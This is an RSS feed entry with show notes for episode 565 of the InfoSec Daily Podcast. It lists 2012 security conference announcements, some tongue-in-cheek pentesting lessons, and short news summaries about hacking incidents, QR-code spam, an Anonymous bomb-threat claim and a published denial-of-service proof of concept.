<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br />
	Where: Seattle, Washington</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Keep your employees SO busy that they don&rsquo;t have time to get pwnd.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Make sure you&#39;re going to get paid, before you submit your invoice.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t sign shit!</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4: </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pre-meeting doxing, and social engineer to be what your client needs you to be&rdquo;</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5:</span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Following don&rsquo;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive tool while dealing with the customer. Be professional and to the point. Don&rsquo;t ramble.</span><br />
	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6</span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: If you do not know how to answer a question, don&#39;t make shit up.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://today.msnbc.msn.com/id/45956305/ns/today-today_people/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://today.msnbc.msn.com/id/45956305/ns/today-today_people/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It would seem that Casey Anthony has complained that someone hacked her computer and posted some personal videos on YouTube. &nbsp;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;My computer was recently hacked, private videos that were recorded,&rdquo; she states in the report. And a Florida official wrote, &ldquo;Offender upset that computer was hacked and videos have been downloaded to YouTube.&rdquo;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Casey Anthony is serving out a year&rsquo;s probation for writing bad checks. &nbsp;&nbsp;&nbsp;The second video, believed to have been recorded on Christmas day, showed Anthony had changed her locks to red while talking excitedly about her new body piercings. &ldquo;I just pierced my nose last night&hellip;very excited,&rdquo; she says.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anthony says &ldquo;I,&rdquo; &ldquo;me,&rdquo; &ldquo;my&rdquo; and &ldquo;mine&rdquo; 40 times in the first video but never mentions her deceased daughter Caylee or the trial that found her not guilty of the baby&#39;s murder. Baez said no one should try to read into Anthony&rsquo;s mind.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Baez told Rivera he is searching for the source of the video leaks and may seek criminal prosecution. </span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.itworldcanada.com/news/group-wants-to-know-if-india-intercepted-its-emails/144645"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itworldcanada.com/news/group-wants-to-know-if-india-intercepted-its-emails/144645</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The U.S.-China Economic and Security Review Commission (USCC) has asked for an investigation after hackers posted online a memo purportedly from India&#39;s military, which claimed that the country had intercepted emails of USCC officials with the help of Nokia, Research In Motion, and Apple.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are aware of these reports and have contacted relevant authorities to investigate the matter,&quot; said USCC spokesman Jonathan Weston on Monday. &quot;We are unable to make further comments at this time,&quot; he added.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The memo, allegedly from the Directorate General of Military Intelligence, Foreign Division, in New Delhi, said that as India did not have access to the USCC local area network, which was a prime target in connection with arch-rival People&#39;s Republic of China, India had signed an agreement with mobile manufacturers in return for giving these companies access to the Indian market.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The memo stated that the military used &quot;backdoors&quot; provided by RIM, Nokia, Apple and unspecified others.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Indian military could not be reached for comment. A local news site however quoted a Indian military spokesman as saying that the documents were forged and were posted online with malicious intent.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span>&nbsp;<a href="http://www.theregister.co.uk/2012/01/11/qr_codes_mobile_spam/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/11/qr_codes_mobile_spam/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers have spotted spam emails that point at URLs featuring embedded Quick Response codes (QR codes).</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QR codes are a two-dimensional matrix barcode that can be scanned by a camera phone to link users directly to a website that can host any type of content, malicious or otherwise. By using QR codes (rather than links) as a jump-off point to spamvertised sites, spammers can disguise the ultimate destination of links as well as improving click-through rates. In particular, the approach helps when it comes to targeting mobile users.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Spam messages spotted by Websense look like traditional pharmaceutical spam emails, with the twist that they link to a legitimate (but abused in this case) website, 2tag.nl. The legitimate web service allows users to create QR codes for URLs but has in this case been abused to create links that ultimately point to Canadian Pharmacy penis pill sites.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is how the scam works. When the spammed user loads the trusted URL in the browser, a QR code appears. Scanning the QR code with a QR reader loads the pharmaceutical spam URL in the browser.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">QR codes could be the next step in mobile malware propagation because the technique offers the &quot;ultimate URL obfuscator&quot;, according to net security firm Websense, which was the first to warn of the QR code mobile spam ploy.</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Elad Sharf, a security researcher at Websense Security Labs, commented: &quot;We&rsquo;ve been looking at QR codes as a potential malware/spam route for a while now. Inherent in the design is a level of trust and novelty that can be abused. In many ways it was just a matter of time before we saw spam messages point to URLs that use embedded QR codes. This is a clear movement and evolution of traditional spammers towards targeting mobile technology.&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More details, including screen grabs of the scam in action, are available in a post by Websense</span><a href="http://community.websense.com/blogs/securitylabs/archive/2012/01/09/spam-emails-link-to-qr-codes.aspx?cmpid=pr"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> here</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Anonymous-Accused-of-Sending-Bomb-Threats-to-Finnish-Anti-Piracy-Firm-245872.shtml"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Accused-of-Sending-Bomb-Threats-to-Finnish-Anti-Piracy-Firm-245872.shtml</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Finland&rsquo;s Copyright, Information and Anti-Piracy Centre (CIAPC), the organization whose website was taken down the other day by Anonymous Finland for ordering one of the country&rsquo;s largest ISPs Elisa to block its account holders from accessing The Pirate Bay (TPB), claims they received a bomb threat from Anonymous hacktivists.</span></p>
<p>	<a href="http://yle.fi/uutiset/news/2012/01/police_investigate_anti-piracy_group_bomb_threat_3165279.html"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YLE</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> reports that CIAPC received an email from Anonymous in which the hackers threatened to place a bomb in their offices this week.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After asking the police to investigate the distributed denial of service (DDoS) attack that forced them to take down their website, now the authorities were called to look into this, much more serious, bomb threat.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Upon hearing the news, Anonymous Finland immediately responded to deny they have any implications, stating that they don&rsquo;t condone with the use of physical violence.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Anonymous doesn&#39;t condone the use of physical violence,&rdquo; the hackers</span><a href="https://twitter.com/#%21/anon_finland"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> state</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We deny to have sent a bomb email threat to CIAPC. We demand YLE to report this statement today &amp; asap: don&#39;t [expletive] us off.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, if they didn&rsquo;t send the bomb threat, it doesn&rsquo;t mean that their protest against Finland&rsquo;s anti-piracy outfits ends here.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online activists say that if IFPI obtains an order that forces TeliaSonera and DNA to block TPB the way Elisa does they&rsquo;ll &ldquo;tear it down.&rdquo;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;IFPI, We ain&#39;t kiddin. We&#39;ve the means &amp; all the time of the world to wipe You out. U&#39;ll bankrupt to fix the mess We&#39;ll cause You,&rdquo; the hacker wrote in a tweet a few hours ago. </span></p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.computerworld.com/s/article/9223359/Public_attack_code_aimed_at_Windows_Web_servers_works_says_Symantec"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9223359/Public_attack_code_aimed_at_Windows_Web_servers_works_says_Symantec</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proof-of-concept exploit was published last Friday on GitHub, a site that hosts software projects, and has been used in the past by hackers to distribute their work.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other security experts were not surprised that attack code appeared within days of Microsoft rushing out a patch for a denial-of-service vulnerability in its software.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;No, not surprising at all,&quot; Andrew Storms, director of security operations at nCircle Security, said in an interview Tuesday. &quot;There was enough interest [in the researchers&#39; original presentation] that we should have expected exploit code soon.&quot;</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The presentation Storms referred to was made by German researchers Alexander Klink and Julian Walde on Dec. 28 at the Chaos Communication Congress (CCC) conference in Berlin, where they demonstrated a flaw in the Web&#39;s most popular application and site programming languages, including Microsoft&#39;s ASP .Net, the open-source PHP and Ruby, Oracle&#39;s Java and Google&#39;s V8 JavaScript.</span></p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-565-pentesting-lessons-casey-anthony-uscc-qr-codes-anonbomb-public-code/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3357/0/infosec-daily-podcast-episode-565.mp3" length="17203344" type="audio/mpeg" />
		<itunes:duration>0:35:47</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Sinc[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 565 for January 11, 2012.&#160; Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Keith Pachulski, and Varun Sharma.
	&#160;
Announcements:
Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go tohttp://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account:https://twitter.com/pentestlessons.
	Lesson 1: Keep your employees SO busy that they don&#8217;t have time to get pwnd.
	Lesson 2: Make sure you&#39;re going to get paid, before you submit your invoice.
	Lesson 3: Don&#8217;t sign shit!
	Lesson 4: Pre-meeting doxing, and social engineer to be what your client needs you to be&#8221;
	Lesson 5: Following don&#8217;t sign shit, remember who is paying the bill. But that does not mean you need to be a complete passive[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 564 &#8211; Retaliation!, It’s Official, Forgotten Passwords, RINOA, Detecting Plagiarism &amp; OWASP Mantra</title>
		<link>http://www.isdpodcast.com/episode-564-retaliation-its-official-forgotten-passwords-rinoa-detecting-plagiarism-owasp-mantra</link>
